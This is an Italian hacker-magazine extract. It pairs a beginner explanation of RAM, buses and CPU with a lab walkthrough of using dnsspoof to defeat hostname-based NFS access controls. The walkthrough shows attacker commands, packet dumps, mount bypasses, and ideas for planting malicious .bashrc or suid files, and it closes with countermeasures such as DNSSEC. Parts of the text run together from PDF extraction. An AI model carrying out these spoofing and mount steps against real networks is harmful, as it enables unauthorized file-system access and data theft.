Su questo argomento ci dilungheremoun po’, perché è di fondamentale im-portanza per la comprensione di tutti glialtri. La RAM (o memoria centrale), è unparticolare tipo di memoria che contie-ne le informazioni e i dati necessari perl’esecuzione dei programmi. È da di-stinguere dalle memorie di massa (co-me l’HD, floppy, cd...) per via delle sueprincipali caratteristiche: essa è fonda-mentalmente di dimensioni molto ri-dotte, è di tipo “volatile” (si perde ilsuo contenuto quando si spegne il PC

RAMCPU PerifericaI/o

PerifericaI/o

BUS

Figura 1L’architettura di un elaboratore

>> La memoria centrale

Figura 2Il funzionamento della RAM

1 2 3 4 5 6 7 8

1 byte = 8 bit

bit

1a WORD

2a WORD

Page 26: Hacker.journal.n..6

>>

Ritornando al nostro argomento principale(la memoria centrale), spieghiamo ora co-me la macchina esegue le operazioni di let-tura dalla memoria e scrittura in memoria:ogni cella di memoria può essere “indiriz-zata” (equivale ad assegnarle un numero aseconda della sua posizione) e quindi “pun-tata”...(tranquilli, se avrete passione e tem-po tutto si chiarirà!). Le posizioni e gli indi-rizzi delle celle sono contenute tutte nel Re-gistro Indirizzi.Il Registro Dati, invece, contiene i datiche devono essere immagazzinati in me-moria, o che sono stati estratti da essa.Quando estraiamo un dato dalla memoria(per esempio un’immagine),noi indichiamoquale dato estrarre, il Registro Indirizzi nefornisce la posizione e la CPU copia il con-tenuto della cella di memoria nel RegistroDati (lungo quanto una WORD), riempen-dolo (ovvero “caricandolo” in memoria).

Nel momento in cui decidiamo di salvareun documento nel nostro piccì, effettuiamoun’operazione di scrittura in memoria. Ilcomputer altro non fà che copiare il Regi-stro Dati in una cella di memoria, deposi-tandolo (STORE). Il Bus mette in comunica-

www.hackerjournal.it |27

cessore utilizza molti registri. Oltre a quelligià mensionati( Reg.Dati e Reg. Indirizzi) èbene ricordare il registro istruzione corren-te, il contatore programma, il registro inter-ruzioni, i registri di lavoro e tra gli altri l’im-portantissimo Registro di Stato, che riportamolte informazioni fondamentali sulle ope-razioni svolte dalla ALU. K

By [email protected]

zione tutte le componenti della macchina,trasferendo informazioni tra CPU, Memo-ria ed interfaccie I/O. Il tutto avviene sottola supervisione del processore che decidequali connessioni attivare tra Master (laCPU), e SLAVE (ad esempio RAM o I/O).I Principali tipi di BUS trasferiscono diversitipi di informazione a seconda della lorofunzione:Il Bus Dati, in modalità “lettura”, trasferi-sce dati da una cella di memoria al regi-stro dati; in modalità “scrittura” li trasferi-sce dal registro alla cella.Il Bus Indirizzi trasferisce il registro indi-rizzi alla memoria principale.C’è poi il Bus Controlli, che scambia in-formazioni tra Master e Slave.E’ la parte della macchina che interpretaed esegue effettivamente le istruzioni (ov-vero gli algoritmi tradotti in linguaggiomacchina) del programma dopo averestratto e decodificato le informazioni (cheson tutte trasmesse in linguaggio binario).

I principali elementi della CPU sono:-Unità di controlli: preleva, decodifica edesegue elaborazioni e trasferimenti;Clock: (Orologio di sistema) sincronizzae coordina tutte le operazioni;-ALU: (Unità Aritmetico-Logica) realiz-za tutte le operazioni aritmetico logiche (ad-dizione, algebra booleana...);Come abbiamo detto in precedenza, il pro-

>> Il Bus

>> La CPU I tipi di memoria centrale non si limitano al-la RAM, esiste infatti un altro importante ti-po di memoria, spesso ignorato perke’ noncomunemente espandibile: parliamo dellaROM (Read Only Memory). Questa zona dimemoria in cui le operazioni sono limitatealla sola lettura, contiene le informazionifondamentali per il funzionamento del si-stema, registrate in modo permanente enon volatile (definite spesso “Firmware”).

Figura 3 Trasferimento dei dati tra memoria e altri componenti

Figura 4Funzioni dei vari Bus della macchina

Lettura

Lettura

Scrittura

01010101

01010101

Registro Dati

Registro indirizzi

Algoritmo: racchiude una seriedi istruzioni precise e dettagliateper raggiungere un determinatoscopo.(Es: Versare dell’acqua inun bicchiere: prendi il bicchiere,controlla se è pieno o vuoto; seè pieno lo scopo è raggiunto; incaso contrario prendi la bottigliae versa l’acqua nel bicchiere.)

?

Bus

Bus

dati

01010101

01010101

Controlli

Bus

Cpu

MEMORIA RAM E ROM

Page 27: Hacker.journal.n..6

COME SFRUTTARE UN BACO DI BIND PER INSERIRSI IN UN FILE SYSTEM DI RETE

dossier

28 | www.hackerjournal.it

Il servizio DNS di Internet ha dei preoccupanti bachi di sicurezza, che possono

essere utilizzati da burloni per spedire le persone su siti diversi da quelli richiesti,

ma che permettono anche di attaccare reti che basano l’autenticazione degli utenti

su questo insicuro servizio.

Network File System attaccati con Dns Spoofing

ello scorso numero abbiamo visto come è possibile in-serirsi in una richiesta di connessione Internet utiliz-zando un baco del software Bind, che sovraintende ilservizio Dns. Questa volta vediamo come questa fallapuò essere sfruttata per attaccare un Network FileSystem (NFS). Se vi siete persi l’articolo precedente,

andatevi a recuperare l’arretrato in formato Pdf, su www.hac-kerjounal.it; ne vale la pena. I servizi NFS sono stati sviluppati allo scopo di permettere ilmount di partizioni di disco remote, se mal configurato questoservizio può essere tratto in inganno da un utente remoto nonautorizzato che voglia accedere alle partizioni condivise. NFS siserve del file /etc/exports per determinare la legittimità o menodelle richieste di mount remote, in tale file sono pertanto indi-cate le risorse che si desidera condividere e le macchine auto-rizzate ad accedere a tali condivisioni.Al momento dell’avvio dei servizi NFS il file /etc/exports vieneprocessato dal comando exportfs -r che viene di norma avviatoautomaticamente dallo script di inizializzazione dei servizi. Nelqual caso tale file contenesse riferimenti ad hostname il sistema

sarà costretto alla risoluzione degli stessi mediante query DNSche potrebbero rendere il sistema soggetto ad accessi non au-torizzati.Come avrete avuto modo di capire, la pratica comune di inse-rire hostname all’interno di liste per il controllo degli accessi

espone il nostro sistema ad enormi rischi e andrebbe per tan-to evitata. Ad ogni modo vediamo come un attacker possa ser-virsi dello spoofing del DNS al fine di guadagnare un accessonon autorizzato ai rami condivisi del nostro filesystem.

Ecco un possibile scenario in cui potrebbe verificarsi un attaccoalle risorse condivise del sistema victim operando da un ipote-tico sistema attack, gli host in gioco sono ancora una voltaquelli utilizzati nel corso dell’esempio precedente:Il sistema victim.linuxbox.com si presenta configurato come se-gue:

/etc/exports:/home/ftp trust.linuxbox.com(ro)

Il file /etc/exports così dichiarato permette (dovrebbe permette-re) l’accesso in sola lettura (ro) alla home directory dell’utente ftpal solo sistema che risponde all’hostname trust.linuxbox.com.

Vediamo cosa accade durante il boot del sistema nel momentoin cui lo script rc.nfsd (Slackware8.0) inizializza i servizi NFS:

Starting NFS services:/usr/sbin/exportfs -r/usr/sbin/rpc.rquotad/usr/sbin/rpc.nfsd 8/usr/sbin/rpc.mountd —no-nfs-version 3/usr/sbin/rpc.lockd/usr/sbin/rpc.statd

Nel preciso istante in cui lo script rc.nfsd avvia exportfs -r il fi-le /etc/exports viene processato e il nome host trust.linux-box.com viene risolto nel relativo indirizzo IP tramite DNSquery, in tal modo in presenza di una richiesta di mount futu-ra il server NFS non avrà più l’esigenza di interrogare il na-meserver ma si avvarrà dell’IP memorizzato a tempo di bootper soddisfare qualsiasi richiesta. Pertanto il solo momento incui i servizi NFS risultano vulnerabili allo spoofing del DNS èrappresentato dal momento in cui esso aggiorna la tabelladelle condivisioni, di norma tale operazione viene svolta du-rante il boot o su richiesta dell’amministratore.

N

>> NFS server bypass

H Hostname IP Descrizione

attack.linuxbox.com 192.168.1.4 Host dell’attackerdns.linuxbox.com 192.168.1.5 Server DNSattack.linuxbox.it 192.168.1.6 Client “fidato”victim.linuxbox.com 192.168.1.7 Server NFS

Page 28: Hacker.journal.n..6

>>

www.hackerjournal.it | 29

L’output di Snort ci offre la possibilità di loggare i pacchetti chetransitano durante questa operazione, ovvero quali query ven-gono inoltrate da victim verso il DNS e quali risposte riceve daquest’ultimo:

attacker@attack:~# snort -vd udp port 53

02/20-13:18:28.241483 192.168.1.7:1072 -> 192.168.1.5:53

UDP TTL:120 TOS:0x0 ID:35227 IpLen:20 DgmLen:64 DF

Len: 44

4F 5D 01 00 00 01 00 00 00 00 00 00 05 74 72 75 O]...........tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com.

00 01 00 01 ...

Victim invia una query intesa a risolvere l’hostname trust.linux-box.com che si trova nel file /etc/exports, questa operazione vie-ne eseguita a tempo di boot o su richiesta dell’admin...

02/20-13:18:28.242207 192.168.1.5:53 -> 192.168.1.7:1072

UDP TTL:64 TOS:0x0 ID:395 IpLen:20 DgmLen:114

Len: 94

4F 5D 85 80 00 01 00 01 00 01 00 01 05 74 72 75 O]...........tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.linuxbox.com.

00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04 ............Q...

C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06 ............Q...

03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80 [email protected].

00 04 C0 A8 01 05 ......

Il server DNS restituisce a victim la risposta contenente l’IP dell’-host trust.linuxbox.com ovvero 192.168.1.6, in fututo quando ilserver NFS riceverà una richiesta di mount remota confronteràl’indirizzo IP del richiedente con quello ottenuto da questa replye nel qual caso dovessero risultare uguali permetterà il pienoaccesso al filesystem.La stessa query si ripete moltplici volte di conseguenza l’outputrestante di Snort è stato omesso in quanto ritenuto poco signifi-cativo. Se ora dovessimo provare a fare mount da un sistemadiverso da trust il risultato sarebbe il seguente:

attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfsmount: 192.168.1.7:/home/ftp failed, reason given by server:Permissiondenied

Come atteso la nostra richiesta di mount viene scartata in quan-to proviene dall’IP 192.168.1.4 (attack) che è ben diverso dal-

l’IP 192.168.1.6 (trust) risolto a boot time. E’ importante notareche nel momento della richiesta di mount da parte di un clientremoto il server NFS non ha la necessità di consultare il DNS inquanto la risoluzione dell’hostname è avvenuta a tempo di boot.Ne consegue che se un malintenzionato volesse eludere i con-trolli di sicurezza di NFS dovrebbe agire durante il processo diavvio del server, qui di seguito mi limito ad illustrare in pochi esemplici passi come potrebbe procedere al fine di perseguire ilsuo scopo:

attacker@attack:~# dnsspoof -f ~/hosts.txtdnsspoof: listening on eth0 [udp dst port 53 and not src192.168.1.4]

L’attacker mette in ascolto Dnsspoof sul proprio sistema in atte-sa di intercettare le DNS query causate dall’inizializzazione deiservizi NFS sulla macchina della vittima, nell’intento di restituirea victim delle reply a tali interrogazioni che riportino come IP delsistema trust l’IP stesso dell’host da cui l’attacker sta operando,ovvero 192.168.1.4. Le reply fasulle forgiate da Dnsspoof do-vranno giungere a victim prima che tale sistema sia raggiuntodalle reply lecite inviategli dal DNS. Qui di seguito vediamo imessaggi che il server victim invia verso l’output standard a te-stimonianza del fatto che sta procedendo all’ inizializzazione ditali servizi:

Starting NFS services:/usr/sbin/exportfs -r/usr/sbin/rpc.rquotad/usr/sbin/rpc.nfsd 8/usr/sbin/rpc.mountd —no-nfs-version 3/usr/sbin/rpc.lockd/usr/sbin/rpc.statd

Segue poi l’output di Dnsspoof che ha catturato e risposto a 4query rivolte al nameserver (192.168.1.5) da parte di victim(192.168.1.7):

attacker@attack:~# dnsspoof -f ~/hosts.txt

dnsspoof: listening on eth0 [udp dst port 53 and not src

192.168.1.4]

192.168.1.7.1074 > 192.168.1.5.53: 62892+ A? trust.linuxbox.com

192.168.1.7.1074 > 192.168.1.5.53: 62893+ A? trust.linuxbox.com

192.168.1.7.1076 > 192.168.1.5.53: 6343+ A? trust.linuxbox.com

192.168.1.7.1076 > 192.168.1.5.53: 6344+ A? trust.linuxbox.com

Vediamo il tutto dalla prospettiva offerta da Snort, ovvero comesi sono svolte le cose a livello di pacchetto:

attacker@attack:~# snort -vd udp port 53

02/20-14:29:39.685629 192.168.1.7:1074 -> 192.168.1.5:53

UDP TTL:145 TOS:0x0 ID:8247 IpLen:20 DgmLen:64 DF

Len: 44

F5 AC 01 00 00 01 00 00 00 00 00 00 05 74 72 75

.............tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-nuxbox.com.

00 01 00 01 ....

02/20-14:29:39.686343 192.168.1.5:53 -> 192.168.1.7:1074

UDP TTL:64 TOS:0x0 ID:416 IpLen:20 DgmLen:114

Snort è un Network Intrusion Detector open source, disponibile persvariati sistemi *nix. Lo si può scaricare da www.snort.org

Page 29: Hacker.journal.n..6

dossier

COME SFRUTTARE UN BACO DI BIND PER INSERIRSI IN UN FILE SYSTEM DI RETE

30 | www.hackerjournal.it

Len: 94

F5 AC 85 80 00 01 00 01 00 01 00 01 05 74 72 75

.............tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-

nuxbox.com.

00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04

............Q...

C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06

............Q...

03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80

[email protected].

00 04 C0 A8 01 05 ......

Questo secondo pacchetto è giunto a destinazione (victim) ma èstato ignorato in quanto PRECEDUTO dalla risposta fasulla for-nita da Dnsspoof. Ora non ci resta che terminare l’esecuzionedi Dnsspoof e accedere alle condivisioni di victim come se fossi-mo l’host legittimo:

attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfsattacker@attack:~#

Ora abbiamo accesso in sola lettura (ro) al ramo del filesystemremoto, e possiamo incominciare a riflettere sui reali problemiin cui possiamo incorrere a causa di un’amministrazione super-ficiale di tali risorse.

Questo comando viene utilizzato per mantenere aggiornata latabella delle condivisioni sul sistema server, in particolare è loscript di inizializzazione dei servizi NFS stesso a preoccuparsidi svolgere tale mansione per mezzo della chiamata exportfs -r. Tuttavia tale comando può contribuire ad aprire un varconella sicurezza del sistema qualora venga richiamato in untempo successivo all’ esecuzione del demone mountd, questopuò verificarsi a causa di uno script inaffidabile o per manodell’admin che richiama tale comando da console. Ho effet-tuato questa scoperta in maniera del tutto casuale durante iprobe che ho effettuato lungo il corso della stesura del pre-sente articolo, premetto che ho avuto modo di testare il pre-sunto bug solo su un sistema che monta Slackware8.0 e ker-nel 2.4.17.Ecco un esempio, mettiamo che l’admin decida di modificareil file /etc/exports e di conseguenza debba aggiornare le ta-belle delle condivisioni con l’ausilio di exportfs -r senza primaprovvedere all’ arresto dei demoni interessati:

victim@victim:~# exportfs -r

Come possiamo vedere dall’output di Snort riportato qui di se-guito, il file /etc/exports viene processato e l’hostname (trust)contenuto in esso viene risolto nell’IP corrispondente(192.168.1.6):

attacker@attack:~# snort -vd udp port 53

02/20-14:49:48.213636 192.168.1.7:1079 -> 192.168.1.5:53

UDP TTL:236 TOS:0x0 ID:19927 IpLen:20 DgmLen:64 DF

Len: 44

CD 39 01 00 00 01 00 00 00 00 00 00 05 74 72 75

.9...........tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-

nuxbox.com.

00 01 00 01 ....

02/20-14:49:48.214328 192.168.1.5:53 -> 192.168.1.7:1079

UDP TTL:64 TOS:0x0 ID:426 IpLen:20 DgmLen:114

Len: 94

CD 39 85 80 00 01 00 01 00 01 00 01 05 74 72 75

.9...........tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-

nuxbox.com.

00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04

............Q...

C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06

............Q...

03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80

[email protected].

00 04 C0 A8 01 05 ......

A questo punto nel momento stesso in cui facciamo il primo ten-tativo di mount da un host non autorizzato notiamo una cosamolto strana, ossia...

attacker@attack:~# snort -vd udp port 53

02/20-14:52:05.417517 192.168.1.7:1079 -> 192.168.1.5:53

UDP TTL:197 TOS:0x0 ID:25875 IpLen:20 DgmLen:64 DF

Len: 44

28 CB 01 00 00 01 00 00 00 00 00 00 05 74 72 75

(............tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-

nuxbox.com.

00 01 00 01 ....

02/20-14:52:05.418237 192.168.1.5:53 -> 192.168.1.7:1079

UDP TTL:64 TOS:0x0 ID:429 IpLen:20 DgmLen:114

Len: 94

28 CB 85 80 00 01 00 01 00 01 00 01 05 74 72 75

(............tru

73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-

nuxbox.com.

00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04

............Q...

C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06

............Q...

03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80

[email protected].

00 04 C0 A8 01 05 ......

Facciamo il punto della situazione:- i demoni erano in esecuzione- viene richiamato exportfs -r- trust.linuxbox.com viene risolto in 192.168.1.6 - tale IP vienememorizzato per impedire query durante le richieste di mountche potranno verificarsi in futuro e che sarebbero altriementisoggette a vulnerabilità dovute al DNS spoofing - prima richiesta di mount- viene nuovamente richiesta la risoluzione di trust!!!

In parole povere, se exportfs -r è stato richiamato mentre mountd

>> l comando Exports

Page 30: Hacker.journal.n..6

www.hackerjournal.it | 31

era in esecuzione, e siamo i primi a richiedere il mount, alloracauseremo una query DNS da parte di victim e saremo in gradodi fornire una risposta arbitraria avvalendosi di Dnsspoof e per-mettendo il mount del filesystem da parte dell’host desiderato!per esempio, l’admin ha appena modificato il file delle esporta-zioni e desidera che le modifiche apportate abbiano effetto, a ta-le scopo esegue il comando necessario (il demone mountd è inesecuzione):

victim@victim:~# exportfs -r

Terminata l’esecuzione del comando exportfs, l’attacker poneDnsspoof in ascolto sull’interfaccia di rete e...

attacker@attack:~# dnsspoof -f ~/hosts.txtdnsspoof: listening on eth0 [udp dst port 53 and not src192.168.1.4]

...si prepara a richiedere il mount:

attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfsattacker@attack:~#

le query rivolte a risolvere l’hostname di trust.linuxbox.com ven-gono intercettate e le risposte fasulle vengono inviate al serverNFS victim che permette il mount da parte del sistema attacker:

attacker@attack:~# dnsspoof -f ~/hosts.txtdnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4]192.168.1.7.1034 > 192.168.1.5.53: 43182+ A? trust.linuxbox.com192.168.1.7.1034 > 192.168.1.5.53: 43183+ A? trust.linuxbox.com

Ora la situazione si è invertita, la vittima è il client NFS e deveaccedere al server NFS trust.linuxbox.com al quale ha accessoregolare. Lo scopo di colui che attacca è quello di far connette-re in maniera del tutto inconsapevole la vittima a un server NFSfasullo. Nell’esempio il server NFS “aggressivo” si trova sul si-stema stesso dell’attacker da cui partirà l’attacco di DNS spoo-fing. Ancora una volta condizione necessaria alla riuscita del-l’attacco è data dall’utilizzo del nome host da parte del latoclient NFS al fine di accedere alle risorse remote. L’attacker de-ve disporre sul server NFS fasullo (il sistema attack.linuxbox.com)un file exports che permetta l’accesso inconsapevole della vittima:

/etc/exports:/home/ftp 192.168.1.7(ro)

l’attacker mette in ascolto Dnsspoof, in questo modo qualsiasi ri-chiesta di mount da parte di un client NFS che abbia come desti-natario il sistema trust verrà reindirizzata verso il server NFS fasul-lo (attack) in maniera del tutto trasparente alla vittima:

attacker@attack:~# dnsspoof -f ~/hosts.txtdnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4

La vittima richiede di montare la porzione di filesystem /home/ftpdal sistema trust...

victim@victim:~# mount trust.linuxbox.com:/home/ftp /mnt/nfsvictim@victim:~#

...in realtà la sua richiesta viene inoltrata a 192.168.1.4, IP sug-geritogli dalla reply fasulla forgiata da Dnsspoof:

attacker@attack:~# dnsspoof -f ~/hosts.txtdnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4]192.168.1.7.1034> 192.168.1.5.53: 62600+ A? trust.linuxbox.com

Una pratica comune che sarebbe bene evitare è quella di in-serire una voce in /etc/fstab che esegua il mount di un filesy-stem NFS, il fatto stesso di automatizzare l’operazione esponei client NFS a rischi ancora maggiori.Ora vi starete chiedendo, “che interessi può avere un utentemalizioso ad ingannare un client NFS al fine di forzare ilmount di un filesystem differente da quello previsto”? Ecco al-cuni esempi:1) Molti sistemi con funzione di workstation montano le /homedegli utenti da remoto durante il boot; se un attacker fosse ingrado di forzare il mount in lettura/scrittura di una home fitti-zia che si trova sul proprio sistema, potrebbe venire in posses-so di dati di fondamentale importanza per l’integrità dell’ac-count utente attaccato, quali ad esempio .bash_history.2) Come nell’esempio precedente, se l’attacker fosse in gradodi montare una directory home fittizia potrebbe inserire in es-sa script come .bash_profile o .bashrc in grado di eseguire po-tenzialmente qualsiasi operazione al momento del login.3) Se l’attacker ha accesso al sistema victim come utente ge-nerico e tale sistema, in seguito alla presenza di una voce nelfile /etc/fstab, esegue un mount automatico tramite NFS, po-trà essere forzato a montare un filesystem aggressivo al fine dimettere a disposizione di attacker file potenzialmente dannosiper la sicurezza stessa del sistema, per esempio suid shell oscript perl setuserid. L’utilizzo delle opzioni nosuid e noexec delcomando mount non sempre offrono la sicurezza sperata, epossono essere aggirate agilmente con semplici accorgimenti:

- nosuid NON impedisce l’esecuzione di script Perl tramiteSuidperl- noexec NON impedisce che i file dannosi vengano copiati suun altro filesystem dove potranno essere eseguiti.

Un buon rimedio è rappresentato dall’utilizzo di software qua-le DNSSEC che applica una firma digitale per assicurare laprovenienza legittima delle reply da parte di un server DNSautorizzato. Effetti collaterali quali la necessità di maggiorebanda a disposizione, maggior mole di lavoro per la macchi-na e per l’amministratore del sistema sono la causa principa-le della lenta diffusione di DNSSEC. K

E4zy ~ OQ Staff

>>

>> NFS client bypass

>> Quali cntromisure prendere

H Hostname IP Descrizione

attack.linuxbox.com 192.168.1.4 Server NFS Fasullodns.linuxbox.com 192.168.1.5 Server DNStrust.linuxbox.it 192.168.1.6 Client “fidato”victim.linuxbox.com 192.168.1.7 Client NFS